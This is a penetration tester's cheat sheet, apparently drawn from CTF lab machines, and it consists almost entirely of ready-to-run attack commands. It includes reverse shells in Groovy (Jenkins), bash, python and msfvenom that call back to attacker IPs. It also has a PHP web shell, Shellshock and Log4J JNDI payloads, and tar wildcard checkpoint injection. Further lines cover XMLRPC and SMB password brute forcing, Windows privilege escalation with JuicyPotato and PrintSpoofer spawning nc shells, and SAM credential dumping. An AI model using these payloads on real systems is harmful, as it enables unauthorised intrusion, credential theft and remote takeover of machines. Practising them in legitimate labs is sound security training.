Pentester's Notes

Pentester's Notes

Published: at 07:57 AM

Table of contents

Open Table of contents

Recon

NMAP

# to get all ports
nmap -p- -T4 10.10.135.68 -v 
sudo nmap -sS -p- -T4 10.10.240.251 -v
# scan deeper the open ports
nmap -p22,80 -sS -sC -sV 10.10.135.68 -v
ls /usr/share/nmap/scripts/ | grep smb

Dirb

dirb http://10.10.135.68/

Gobuster

gobuster -w /usr/share/wordlists/dirb/big.txt dir -u http://seasurfer.thm/

Nikto

nikto -h 10.10.135.68

Wfuzz

subdomains

wfuzz -c -f sub-fighter -w subd.txt -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" --hw 290
wfuzz -c -f sub-fighter -w subdomains.lst  -u 'http://nahamstore.thm' -H "Host: FUZZ.nahamstore.thm" --hw 65

In Web Browser

PHP Website

SMB, RDP

smbclient -L 10.10.150.121 -N
smbmap -H 10.10.240.251  
smbmap -u 'lilyle' -p 'ChangeMe#1234'  -H windcorp.thm  # shares
smbmap -u 'lilyle' -p 'ChangeMe#1234'  -H windcorp.thm  -r  # things inside shares
enum4linux -a 10.10.240.251
# brute force
crackmapexec smb 10.10.83.74 -u Jareth -p /usr/share/wordlists/rockyou.txt
# get access
evil-winrm -i 10.10.83.74 -u Jareth -p sarah

SNMP

# Community String Brute Force
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/SNMP/snmp-onesixtyone.txt
onesixtyone 10.10.83.74 -c snmp-onesixtyone.txt
# enum snmp
snmp-check -c openview 10.10.83.74
snmpwalk

CMS

Joomla

http://10.10.114.248/joomla//administrator/manifests/files/joomla.xml says that the version is 3.9.12.

/README.txt

You can find an exploit in https://www.exploit-db.com/exploits/42033. There is a SQLI in following url: http://10.10.107.150/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml<SQLI>

Another exploit that can be found: https://github.com/stefanlucas/Exploit-Joomla

RCE is possible

sar2html

/_test has sar2html which is vulnerable to RCE. /index.php?plot=;<command>, then click select host. https://www.exploit-db.com/exploits/47204

Wordpress

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress Users: http://internal.thm/blog/index.php/wp-json/wp/v2/users/

/index.php/comments/feed/ worth to check

XMLRPC

curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params>
<param><value>admin</value></param><param><value>pass</value></param></params></methodCall>" http://internal.thm/blog/xmlrpc.php

Brute force XMLRPC

#!/bin/bash
while IFS= read -r pass; do
echo $pass
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params>
<param><value>admin</value></param><param><value>$pass</value></param></params></methodCall>" http://internal.thm/blog/xmlrpc.php
done < "/usr/share/wordlists/rockyou.txt"

jenkins

/script for rce

Thread.start {
String host="10.8.97.245";
int port=1234;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}

Exploitation

RCE and Reverse shell payloads

php

<?php system($_GET['cmd']);?>

https://github.com/pentestmonkey/php-reverse-shell https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php - PHP Reverse Shell https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php - PHP Reverse Shell

bash

/bin/bash -c 'bash -i >& /dev/tcp/10.8.97.245/4444 0>&1'

msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.97.245 LPORT=1234 -f aspx >reverse.aspx

Command Injection

https://book.hacktricks.xyz/pentesting-web/command-injection /ping?ip=10.8.97.245 %0A ls

LFI

http://10.10.97.188/?view=php://filter/read=convert.base64-encode/resource=dog/../flag - converts into bas64. Useful when you cannot get php file.

SQLi

sqlmap

sqlmap -r aaa.req --dump-all --batch

Shellshock

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://10.10.135.68/cgi-bin/test.cgi 
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /bin/bash -c 'exec /bin/bash -i >& /dev/tcp/10.8.97.245/1234 0>&1'" http://10.10.135.68/cgi-bin/test.cgi

Log4J

nc -lvnp 9001

git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc
vim poc.py 
# change /bin/sh to cmd
# the machine is Windows
python3 poc.py --userip 10.10.14.92 --webport 8000 --lport 9001
# then paste  ${jndi:ldap://10.10.14.92:1389/a} in input place

Post Exploitation

Linux

NFS Share

# find available folders
showmount -e 10.10.240.128
# mount 
mkdir /mnt/new_back
mount -t nfs 10.10.240.128:/home/nfs /mnt/new_back -o nolock

Linux PrivEsc Checks

sudo-l
# suid
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 02>/dev/null
# crontab
cat /etc/crontab
# capabilities
getcap -r / 2>/dev/null
# files owned by
find / -user hakanbey 2>/dev/null
find /usr/bin -group hakanbey 2>/dev/null | more
# check network connections
ss -tulpn
# check prcesses
ps aux | grep root
# check some folders
ls /opt

Linpeas

https://github.com/peass-ng/PEASS-ng/blob/master/linPEAS/README.md

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Docker

r00t@ultratech-prod:~$ groups
r00t docker

https://gtfobins.github.io/gtfobins/docker/

docker run -v /:/mnt --rm -it bash chroot /mnt sh
# whoami
root

if no bash images then docker images and choose one.

Tar and Wildcard

if some * in some backup.sh that runs periodically, then checkpoints https://www.gnu.org/software/tar/manual/html_section/checkpoints.html

# for example in file this command
tar -zcf /home/kyle/backups/invoices.tgz *

then create a shell and a checkpoint

echo $'/usr/bin/python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.8.35.156\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")\'' > shell.sh

echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Windows

Better Runas - RunasCs

# for reverse shell
C:\> RunasCs.exe <user> <pass> cmd.exe -r 10.10.14.92:1234

System and Sam creds dump

impacket-secretsdump -ts local -system system.bak -sam sam.bak

Potato Attack

https://github.com/ohpe/juicy-potato/releases

JuicyPotato.exe -l 1337 -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe -e cmd.exe 10.8.97.245 4444" -t *

https://github.com/itm4n/PrintSpoofer

PrintSpoofer64.exe -c "c:\inetpub\wwwroot\nt4wrksv\nc.exe -e cmd.exe 10.8.97.245 4444"

HHUPD.EXE

https://sotharo-meas.medium.com/cve-2019-1388-windows-privilege-escalation-through-uac-22693fa23f5f

Brute Force and Password Cracking

john

john hash --wordlist=/usr/share/wordlists/rockyou.txt

FFUF

ffuf -u http://10.10.142.177/api/login -X POST -w userlist.txt:W1,md5_passwords.txt:W2 -H "Content-Type: application/json" -d '{"username":"W1","password":"W2"}' -v -o result

Hyrda

hydra -P /usr/share/wordlists/rockyou.txt -l admin  blitz.icsd http-get-form "/:j_username=^USER^&j_password=^PASS^&from=&Submit=:Invalid username or password"

Sucrack

https://github.com/hemp3l/sucrack

cd sucrack
./configure 
make
src/sucrack -u hakanbey -w 100 wordlist.txt

Others

Shell Stabilization

Unix

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# ctrl+z
stty raw -echo; fg

Windows

msfconsole
# then 
use exploit/windows/misc/hta_server
set lhost <ip>
run
# then in windows 
mshta http://10.10.14.92:8080/2ao4a48kDfJgdCl.hta

SSH Port Forwarding

on remote host service is on 8080 and it forwarded to local to work on 8080

ssh -L 8080:172.17.0.2:8080 [email protected] -N

Socat Port Forwarding

service works on 22 on localhost and you forward it to 2222

socat TCP-LISTEN:2222,fork TCP:127.0.0.1:22

RDP Connect

xfreerdp /u:Wade /v:10.10.15.65 /p:parzival /dynamic-resolution

Decode Encode

https://cyberchef.io/

Stenography

Steghide

steghide extract -sf somefile.png

Reverse engineering

strings somebinary
ltrace somebinary

Buffer Overflow

objdump -d -Mintel hacktheworld
echo -n aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > input
echo -n 580640000000 | xxd -r -p >> input 

gdb hacktheworld
(gdb) run < input